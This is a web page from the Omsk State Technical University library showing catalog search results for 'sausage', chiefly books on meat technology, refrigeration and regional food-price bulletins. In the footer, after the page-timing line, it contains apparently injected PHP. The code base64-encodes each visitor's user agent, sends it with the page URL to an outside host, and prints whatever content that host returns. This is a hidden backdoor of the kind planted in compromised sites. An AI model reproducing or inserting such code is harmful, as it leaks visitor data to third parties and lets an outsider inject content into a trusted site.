Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

128 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КОЛБАСА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 42
1. 
Коснырева, Людмила Михайловна. Товароведение и экспертиза мяса и мясных товаров [Текст] : Учебник гриф-УМО / Л. М. Коснырева, В. И. Криштафович, В. М. Позняковский, 2005. - 320 с.
Держатели документа (Информация об экземплярах) 
2. 
Примеры и задачи по холодильной технологии пищевых продуктов. Теплофизические основы [Текст] : учеб. пособие для вузов по специальности "Технология консервов и пищеконцентратов" направления подгот. дипломир. специалистов "Технология продовольственных продуктов специального назначения и общественного питания".. / А. В. Бараненко [и др.], 2012. - 268, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены теплофизические основы холодильной технологии пищевых продуктов, приведены расчетные соотношения. Рассмотрены примеры решения задач и контрольные задачи, а также даны примеры расчетов и задания для самостоятельного решения.

3. 
Холодильная технология пищевых продуктов [Текст] : учеб. для вузов по специальности 260504 (270800) "Технология консервов и пищеконцентратов" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов социального назначения и общественного питания" и магист. программе 260100.68 (552418) "Холодильная технология пищевых продуктов": в 3 ч. Ч. 2 : Технологические основы / В. И. Филиппов [и др.], 2008. - 571, [1] с.
Держатели документа (Информация об экземплярах) 

Во второй части учебника "Холодильная технология пищевых продуктов" рассматриваются технологические аспекты процессов холодильного консервирования пищевых продуктов. Изложены состав и свойства пищевых продуктов, значение микроорганизмов при холодильном консервировании, технологические режимы холодильной обработки, отепления, размораживания, условия хранения и транспортирования различных видов сырья и продуктов их переработки. Приведены технические средства, применяемые в современной холодильной технологии пищевых продуктов.

4. 
Холодильная техника и технология [Текст] : респ. межведомств. науч.-техн. сб. Вып. 45 / редкол.: И. Г. Чумак [и др.], 1987. - 110, [1] с.
Ключевые слова 
СБОРНИК -- ТЕПЛОМАССООБМЕН -- КРИОГЕННАЯ -- СИСТЕМА -- ЖИЗНЕОБЕСПЕЧЕНИЕ -- СТУПЕНЬ -- СЖАТИЕ -- ХОЛОДОПРОИЗВОДИТЕЛЬНОСТЬ -- ДЕТАНДЕР -- ЦЕОЛИТ -- АДСОРБЦИЯ -- ДВУОКИСЬ -- УГЛЕРОД -- ОХЛАЖДЕНИЕ -- ХЛОР -- ВОЗДУХООХЛАДИТЕЛЬ -- ОТТАИВАНИЕ -- ИНЕЙ -- ГИДРАВЛИЧЕСКОЕ -- СОПРОТИВЛЕНИЕ -- ЩЕЛЕВОЙ -- КАНАЛ -- ТЕПЛООБМЕННИК -- ИЗНОСОСТОЙКОСТЬ -- ПОРШНЕВОЙ -- КОМПРЕССОР -- ПРОФИЛИРОВАНИЕ -- КОЛЬЦО -- СКОРОМОРОЗИЛЬНЫЙ -- ТЕПЛООБМЕН -- СУШКА -- РЫБА -- ВОЗДУХОРАСПРЕДЕЛЕНИЕ -- СУШИЛКА -- КОЛБАСА -- ПОЛУФАБРИКАТ -- ХОЛОДИЛЬНОЕ -- КОНСЕРВИРОВАНИЕ -- ПРИРОДООХРАННАЯ -- ДЕЯТЕЛЬНОСТЬ
Держатели документа (Информация об экземплярах) 
5. 
Динамика систем, механизмов и машин [Текст] : материалы VIII Междунар. науч.-техн. конф. (Омск, 13-15 нояб. 2012 г.) : в 5 кн. / ОмГТУ [и др.]. Кн. V / редкол.: А. В. Косых [и др.] ; дар. В. В. Шалай, 2012. - 364 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- СБОРНИК -- КОМПРЕССОР -- ПРОТИВОТАНКОВАЯ -- УПРАВЛЯЕМАЯ -- РАКЕТА -- МОЩНОСТЬ -- ДВИГАТЕЛЬ -- ТАНКОВОЕ -- ВООРУЖЕНИЕ -- ТОЧНОСТЬ -- РЕЗЬБОВОЕ -- СОЕДИНЕНИЕ -- ДИАГНОСТИРОВАНИЕ -- ПОЖАРНОЕ -- ОБОРУДОВАНИЕ -- ТАНК -- АВАРИЙНАЯ -- СИГНАЛИЗАЦИЯ -- ЭЛЕКТРОННЫЙ -- КОДОВЫЙ -- ЗАМОК -- МНОГОЦЕЛЕВАЯ -- ГУСЕНИЧНАЯ -- КОЛЕСНАЯ -- МАШИНА -- ВОЕННОЕ -- ОБРАЗОВАНИЕ -- БЕЗОПАСНОСТЬ -- РОССИЯ -- МУЛЬТИМЕДИА -- НАНОТЕХНОЛОГИЯ -- ПРЕДПРИНИМАТЕЛЬСТВО -- ЭТИКА -- ИННОВАЦИЯ -- ИНОСТРАННЫЙ -- ВОЕННОСЛУЖАЩИЙ -- БИОТЕХНОЛОГИЯ -- НОВОРОЖДЕННЫЙ -- ПОЛИОРГАННАЯ -- НЕДОСТАТОЧНОСТЬ -- БИОПРОДУКТЫ -- ГЕРОНТОЛОГИЧЕСКОЕ -- ПИТАНИЕ -- БИФИДОБАКТЕРИЯ -- ДОЛГОЛЕТИЕ -- ПОЖИЛОЙ -- АНТИСТРЕССОВОЕ -- МОЛОЧНЫЙ -- ШКОЛЬНИК -- ПЕРЕПЕЛ -- КУРЫ -- ТРИПТОФАН -- БИОНИКА -- НАНОМЕДИЦИНА -- КОРОВА -- МАСТИТ -- СЫВОРОТКА -- КРОЛИКОВОДСТВО -- КОРМОВАЯ -- ДОБАВКА -- МЕД -- ДИАСТАЗНОЕ -- ЧИСЛО -- КОЛБАСА -- МЯСНЫЕ -- КОНСЕРВЫ -- ЛИЗИН -- ФЕРМЕНТ -- БАД -- МИКРОФЛОРА -- ЖКТ -- НИР -- НАЧАЛЬНИК -- ТОМСКАЯ -- ГУБЕРНИЯ -- БИБЛИОТЕКА -- МАТЕРИАЛЬНОЕ -- ОБЕСПЕЧЕНИЕ -- АСОЦИАЛЬНОЕ -- ПОВЕДЕНИЕ -- ПОЛИТЕХНИК -- СТУДЕНЧЕСКИЙ -- СТРОИТЕЛЬНЫЙ -- ОТРЯД -- ГУМАНИТАРНОЕ -- ОБРАЗОВАНИЕ -- ЮЗАБИЛИТИ -- КОМПЬЮТЕРНАЯ -- ИГРА -- ДЕТИ -- КАШИРОВАНИЕ -- УПАКОВОЧНЫЙ -- МАТЕРИАЛ -- ЦВЕТОВОСПРОИЗВЕДЕНИЕ -- ИНТЕРЬЕР -- ТОЛЕРАНТНОСТЬ -- ВЫРАЗИТЕЛЬНОСТЬ -- ГРАФИКА -- АРХИТЕКТОНИКА -- ДИЗАЙН -- ТИПОГРАФИКА -- СТАЙЛИНГ -- ПЛАКАТ -- США -- РЕКЛАМА -- МАРКЕТИНГ -- ИНТЕРНЕТ-МАГАЗИН -- КОНТЕНТ -- КОРЕЯ -- ДАТСКИЙ -- ГРАФИЧЕСКИЙ -- ДЕРЕВЯННОЕ -- ЗОДЧЕСТВО -- КОММУНИКАЦИЯ -- ТРАФАРЕТНАЯ -- ПЕЧАТЬ
Оглавление 
Держатели документа (Информация об экземплярах) 

В сборнике рассмотрены актуальные вопросы динамических расчетов в различных отраслях знаний: при проектировании машин и механизмов, электроэнергетических и электромеханических систем, информационных и измерительных процессов, испытаний и контроля, тепловых и газодинамических процессов, конструкций летательных аппаратов, технологических процессов, трибосистем, а также вопросы математического моделирования в динамике, биомеханике и социальных системах.

Полный текст
6. 
Мезенова О. Я. Производство копченых пищевых продуктов [Текст] / О. Я. Мезенова, И. Н. Ким, С. А. Бредихин, 2001. - 207 с.
Держатели документа (Информация об экземплярах) 
7. 
Кецелашвили Д. В. Технология мяса и мясных продуктов. В 3 ч. Ч. 2 [Текст] : учеб.особие для студентов специальности 270900 "Технология мяса и мясных продуктов" всех форм обучения / Д. В. Кецелашвили, 2004. - 159 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
8. 
Сборник рецептур мясных изделий и колбас [Текст] : сборник / Сост. К. П. Юхневич, 2000. - 321,[1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
9. 
Сборник рецептур мясных изделий и колбас [Текст] : сборник / Сост. К. П. Юхневич, 2003. - 322 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
10. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за октябрь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
11. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за ноябрь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
12. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за апрель 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
13. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за март 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
14. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за декабрь 2009 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 10 с.
Держатели документа (Информация об экземплярах) 
15. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за май 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
16. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за июнь 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
17. 
Радиоактивные изотопы и ядерные излучения в народном хозяйстве СССР [Текст] : тр. Всесоюз. совещ., Рига, 12-16 апр. 1960 г.: в 4 т. / Гос. науч.-техн. ком. Совета Министров СССР, Гос. ком. Совета Министров СССР по использованию атом. энергии; под ред. Н. А. Петрова [и др.]. Т. 2 : Строительство и промышленность строительных материалов. Легкая промышленность. Пищевая промышленность и сельское хозяйство. Медицина / под ред. П. И. Антышева [и др.], 1961. - 267 с.
Ключевые слова 
КАЧЕСТВО -- ПРИМЕНЕНИЕ -- КОНТРОЛЬ -- ЭНЕРГЕТИКА -- ЦЕМЕНТ -- ПРОИЗВОДСТВО -- ПЛОТНОМЕР -- ЩЕБЕНКА -- БЕТОН -- ПРИБОР -- ИЗМЕРИТЕЛЬНЫЙ -- СТЕКЛО -- СИНТЕТИКА -- ТКАЧЕСТВО -- ПАРФЮМЕРИЯ -- КОСМЕТИКА -- БУМАГА -- АВТОМАТИЧЕСКИЙ -- ТОРФ -- ВАКУУМ-ВЫПАРНОЙ -- ВЫПАРНОЙ -- АППАРАТ -- КОНДИТЕРСКАЯ -- РЫБА -- КОЛБАСА -- ЗЕРНО -- СИЛОС -- ЯДОХИМИКАТ -- МОЛОКО -- МЯСО -- ПШЕНИЦА -- КУРИЦА -- ТРАКТОР -- ПОЧВА -- ВЛАГОМЕР -- ГРУНТ -- ВЛАЖНОСТЬ -- ДИАГНОСТИКА -- ГЕМАТОЛОГИЯ -- ОПУХОЛЬ -- РАДИОГРАФИЯ -- ТЕРАПИЯ -- ЛУЧЕВАЯ -- РАК -- ДЕРМАТОЗ -- ДОЗИМЕТРИЯ
Держатели документа (Информация об экземплярах) 
18. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за август 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
19. 
Средние цены и индексы потребительских цен на продовольственные товары в Омской области за июль 2010 года [Текст] : стат. бюл. / Федер. служба гос. статистики, Территор. орган Федер. службы гос. статистики по Ом. обл., 2010. - 11 с.
Держатели документа (Информация об экземплярах) 
20. 
Позняковский, Валерий Михайлович. Экспертиза мяса и мясопродуктов [Текст] : Учеб. пособие для вузов по специальности "Товароведение и экспертиза товаров" / В. М. Позняковский, 2002. - 524 с.
Оглавление 
  • Химический состав мяса и мясопродуктов. - с.473-498
  • Порядок сертификации мяса, мясной продукции, мяса птицы, яйца и продуктов их переработки. - с.499-514

Книга содержит наиболее полный учебно-справочный материал по экспертизе мяса и мясопродуктов, включая свежее мясо и продукты из говядины, баранины, конины, оленины.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2963 - 21.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.86 с.12 запросов, 0.47c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;